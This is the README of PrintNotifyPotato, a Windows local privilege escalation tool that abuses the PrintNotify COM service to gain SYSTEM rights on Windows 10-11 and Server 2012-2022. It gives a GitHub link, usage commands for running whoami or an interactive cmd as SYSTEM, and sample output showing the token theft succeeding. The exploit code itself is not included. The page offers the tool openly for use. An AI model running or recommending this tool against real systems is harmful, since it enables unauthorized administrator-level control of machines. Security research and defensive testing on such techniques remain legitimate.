Awesome
PrintNotifyPotato
PrintNotifyPotato
Another potato, using PrintNotify COM service for lifting rights
For Windows 10 - 11 Windows Server 2012 - 2022
Usege
C:\Windows\Temp >PrintNotifyPotato.exe
aaaa aaa aaa
aaaa aaa aaa
aaaa aaa aaa
aaaa aaa aaa
aaaa aaa aaa
aaaa aaa aaa
aaaa aaa aaaaaaa aaaaaaa aaa aaaa
aaaaaaaaaaa aaaaaaaaa aaaaaaaaa aaa aaaa
aaaaaaaaaaa aaaa aaa aaaa aaaa aaa aaaa
aaaa aaa aaa aaaa aaaa aaaaaaa
aaaa aaa aaaaaaa aaa aaaaaaa
aaaa aaa aaaaaaaaa aaa aaaaaaaa
aaaa aaa aaaa aaa aaa aaa aaaa aaa
aaaa aaa aaa aaaa aaaa aaaa aaa aaaa
aaaa aaa aaa aaaaa aaaa aaaa aaa aaaa
aaaa aaa aaaaaaaaaa aaaaaaaa aaa aaa
aaaa aaa aaaa aaaa aaaaa aaa aaaa
Github: https://github.com/BeichenDream/PrintNotifyPotato
Example:
PrintNotifyPotato.exe whoami
PrintNotifyPotato.exe cmd interactive
C:\Windows\Temp >PrintNotifyPotato.exe whoami
[*] Create PrintNotify Success!
[*] Create FakeIUnknown Success!
[*] CreatePointerMoniker Success!
[*] Trigger......
[*] Got Token: 0x3d4
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] DuplicateTokenEx Success! PrimaryToken: 0x1016
[*] process start with pid 7272
nt authority\system
C:\Windows\Temp >
Reference/Thanks
http://code.google.com/p/google-security-research/issues/detail?id=128
zcgonvh
https://github.com/antonioCoco/JuicyPotatoNG
https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/